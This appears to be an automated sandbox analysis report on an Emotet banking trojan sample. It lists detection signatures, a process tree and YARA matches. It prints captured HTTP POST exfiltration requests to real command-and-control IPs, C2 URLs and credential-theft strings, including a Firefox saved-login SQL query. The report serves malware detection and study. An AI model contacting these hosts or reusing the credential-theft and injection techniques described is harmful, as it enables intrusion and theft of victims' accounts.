Analysis Report SecuriteInfo.com.Trojan.DownLoader34.9370.19760.13969

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.13969 (renamed file extension from 13969 to exe)
Analysis ID: 255759
MD5: a2c038cc8205f00dca64aa3d20bb9ecd
SHA1: 957478059eb00dd57b0b3030609aab143148decd
SHA256: f72b1feeab655ed062315560ef318ff48e4a980ba00e4a58a56a289a29c84858

Most interesting Screenshot:

Detection

Emotet, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
    • WinRtTracing.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\webservices\WinRtTracing.exe MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracing.exe (PID: 6016 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracing.exe (PID: 4516 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracing.exe (PID: 4584 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracingoe.exe (PID: 4300 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 6132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5456 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6088 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2020 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.1279031602.0000000000580000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.1543674898.0000000000671000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.1547549347.0000000003400000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.1547978728.0000000003660000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
(5 of 20 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.WinRtTracing.exe.35b0000.4.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.WinRtTracing.exe.3660000.5.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.3.WinRtTracing.exe.3d20000.4.raw.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
1.3.WinRtTracing.exe.3580000.5.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth |
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
1.3.WinRtTracing.exe.3580000.5.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
(5 of 13 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation
Source: Process started Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp', CommandLine: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, NewProcessName: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, OriginalFileName: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, ParentCommandLine: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, ParentImage: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, ParentProcessId: 6928, ProcessCommandLine: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp', ProcessId: 4516

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.1279031602.0000000000580000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe Code function: 0_2_0044438D __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_0044438D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe Code function: 0_2_004448A3 FindFirstFileA,FindClose,0_2_004448A3
Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe Code function: 5_2_0040A1A7 FindFirstFileW,FindNextFileW,5_2_0040A1A7
Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe Code function: 5_1_0040A1A7 FindFirstFileW,FindNextFileW,5_1_0040A1A7
Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe Code function: 6_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,6_2_0040702D
Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe Code function: 6_1_0040702D FindFirstFileA,FindNextFileA,6_1_0040702D
Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe Code function: 7_2_00007FF6E9476B14 FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_00007FF6E9476B14
Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe Code function: 7_2_00007FF6E9472154 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00007FF6E9472154
Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe Code function: 7_2_00007FF6E94841DC FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6E94841DC
Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe Code function: 7_2_00007FF6E9476088 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,7_2_00007FF6E9476088
Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe Code function: 7_2_00007FF6E94614F0 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00007FF6E94614F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.5:49740 -> 179.60.229.168:443
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.5:49743 -> 185.94.252.13:443
Source: global traffic HTTP traffic detected: POST /0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/ HTTP/1.1
  Referer: http://185.94.252.13/0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/
  Content-Type: multipart/form-data; boundary=---------------------------071551534042271
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /NczmKeYDGfHp/5l4guzk95jLWV0b/LbnZGPSlgdLJQpmZ4Ru/XI7nSSxFAd/6KL23UUS781fHpq/ HTTP/1.1
  Referer: http://185.94.252.13/NczmKeYDGfHp/5l4guzk95jLWV0b/LbnZGPSlgdLJQpmZ4Ru/XI7nSSxFAd/6KL23UUS781fHpq/
  Content-Type: multipart/form-data; boundary=---------------------------792132913284084
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /LkQRkz/R3f1zycgLzHWjXhLWT/rC0s4XESEawZUtL5uL/ HTTP/1.1
  Referer: http://185.94.252.13/LkQRkz/R3f1zycgLzHWjXhLWT/rC0s4XESEawZUtL5uL/
  Content-Type: multipart/form-data; boundary=---------------------------708151790454032
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /luuMxtU8/ HTTP/1.1
  Referer: http://185.94.252.13/luuMxtU8/
  Content-Type: multipart/form-data; boundary=---------------------------920119865678551
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/ HTTP/1.1
  Referer: http://185.94.252.13/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/
  Content-Type: multipart/form-data; boundary=---------------------------728227786047311
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6tltkgW1nrL6LLQh/343N4F6afmz1RZs9D/kHuvewuN4uY/IVcygh5gG/ghYHblPr/ HTTP/1.1
  Referer: http://185.94.252.13/6tltkgW1nrL6LLQh/343N4F6afmz1RZs9D/kHuvewuN4uY/IVcygh5gG/ghYHblPr/
  Content-Type: multipart/form-data; boundary=---------------------------122433531428026
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4628
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/ HTTP/1.1
  Referer: http://88.217.172.65/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/
  Content-Type: multipart/form-data; boundary=---------------------------572715936792328
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 88.217.172.65:443
  Content-Length: 4356
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 179.60.229.168
Source: unknown TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: WinRtTracing.exe, 00000005.00000003.1327753679.0000000000A09000.00000004.00000001.sdmp String found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.facebook.com (Facebook)
Source: WinRtTracing.exe, 00000005.00000003.1327753679.0000000000A09000.00000004.00000001.sdmp String found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.yahoo.com (Yahoo)
Source: WinRtTracing.exe, 00000001.00000003.1328991766.00000000037F1000.00000004.00000001.sdmp, WinRtTracing.exe, 00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: WinRtTracing.exe, 00000001.00000003.1328991766.00000000037F1000.00000004.00000001.sdmp, WinRtTracing.exe, 00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: WinRtTracing.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST /0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/ HTTP/1.1
  Referer: http://185.94.252.13/0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/
  Content-Type: multipart/form-data; boundary=---------------------------071551534042271
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: WinRtTracing.exe, 00000001.00000003.1316290803.0000000002694000.00000004.00000001.sdmp String found in binary or memory: http://179.60.229.168/QMTxx/fRj4LOH/d1I0lWeH4yIv/CW7zkyIMpHmzAU/
Source: WinRtTracing.exe, 00000001.00000003.1317407858.0000000002696000.00000004.00000001.sdmp String found in binary or memory: http://179.60.229.168:443/QMTxx/fRj4LOH/d1I0lWeH4yIv/CW7zkyIMpHmzAU/
Source: WinRtTracing.exe, 00000001.00000003.1317407858.0000000002696000.00000004.00000001.sdmp String found in binary or memory: http://179.60.229.168:443/QMTxx/fRj4LOH/d1I0lWeH4yIv/CW7zkyIMpHmzAU/4
Source: WinRtTracing.exe, 00000001.00000003.1320598627.00000000026B8000.00000004.00000001.sdmp, WinRtTracing.exe, 00000001.00000003.1320726632.00000000024E2000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13/luuMxtU8/
Source: WinRtTracing.exe, 00000001.00000002.1543844951.000000000086A000.00000004.00000020.sdmp String found in binary or memory: http://185.94.252.13:443/0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpR
Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/LkQRkz/R3f1zycgLzHWjXhLWT/rC0s4XESEawZUtL5uL/
Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/NczmKeYDGfHp/5l4guzk95jLWV0b/LbnZGPSlgdLJQpmZ4Ru/XI7nSSxFAd/6KL23UUS781fHpq
Source: WinRtTracing.exe, 00000001.00000003.1329090354.00000000024EC000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/
Source: WinRtTracing.exe, 00000001.00000003.1323670599.00000000024ED000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/9/
Source: WinRtTracing.exe, 00000001.00000003.1329090354.00000000024EC000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/_(
Source: WinRtTracing.exe, 00000001.00000003.1323670599.00000000024ED000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/t(
Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmp String found in binary or memory: http://185.94.252.13:443/luuMxtU8/
Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmp String found in binary or memory: http://88.217.172.65:443/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/
Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmp String found in binary or memory: http://88.217.172.65:443/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/F
Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmp String found in binary or memory: http://88.217.172.65:443/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/H
Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: WinRtTracing.exe, 00000005.00000002.1327970586.000000000019C000.00000004.00000010.sdmp String found in binary or memory: http://www.nirsoft.net
Source: WinRtTracing.exe, WinRtTracing.exe, 00000006.00000002.1326742844.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: WinRtTracing.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: svchost.exe, 00000012.00000003.1539811350.000001B98FD6F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.1539617617.000001B98FD5C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.1539603419.000001B98FD4B000.00000004.00000001.sdmp String found in binary or memory: https://picsart.com/privacy-policy?hl=en
Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: WinRtTracing.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                    Source: WinRtTracing.exe, 00000001.00000002.1543844951.000000000086A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0044082C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004528D7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_004528EC GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe | Code function: 0_2_0043CDD3 GetKeyState,GetKeyState,GetKeyState,GetKeyState

                    E-Banking Fraud:

                    Emotet Banking Trojan found
                    Source: unknown | Process created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'
                    Source: unknown | Process created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Process created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'
                    Yara detected Emotet
                    Source: Yara match | File source: 00000000.00000002.1279031602.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1543674898.0000000000671000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1547549347.0000000003400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1547978728.0000000003660000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1317424943.00000000026FA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1547685679.00000000035B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1317378021.00000000026D8000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1320801058.000000000270B000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1322236899.0000000002759000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1323629032.00000000038F8000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1279042884.0000000000591000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1543614308.0000000000660000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.1317331922.00000000026B4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 1.2.WinRtTracing.exe.35b0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.WinRtTracing.exe.3660000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.WinRtTracing.exe.3400000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.WinRtTracing.exe.35b0000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.WinRtTracing.exe.3400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.WinRtTracing.exe.3660000.5.raw.unpack, type: UNPACKEDPE

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: 00000006.00000002.1326742844.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 00000001.00000003.1329105049.0000000003580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 1.3.WinRtTracing.exe.3580000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 6.2.WinRtTracing.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 6.2.WinRtTracing.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exe | Code function: 5_1_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe | Code function: 7_2_00007FF6E948D6BC SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
